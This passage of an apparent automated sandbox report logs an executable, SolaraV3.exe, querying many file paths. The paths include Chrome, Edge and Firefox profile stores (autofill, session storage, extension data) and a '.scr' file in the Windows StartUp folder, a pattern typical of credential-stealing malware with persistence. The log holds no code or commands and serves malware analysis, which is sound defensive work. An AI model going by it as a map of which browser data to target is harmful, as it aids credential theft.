              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\_sqlite3.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\_socket.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\select.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\_ssl.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\_hashlib.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\_queue.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\unicodedata.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CommerceHeuristics VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\6f70cc77-7837-4f44-9c31-7de59e446d67 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\6f70cc77-7837-4f44-9c31-7de59e446d67 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\cs VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\da VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\en VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\en_GB VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fi VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fil VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\it VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\id VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\nl VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ru VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_metadata VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\6f70cc77-7837-4f44-9c31-7de59e446d67 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules VolumeInformationJump to behavior
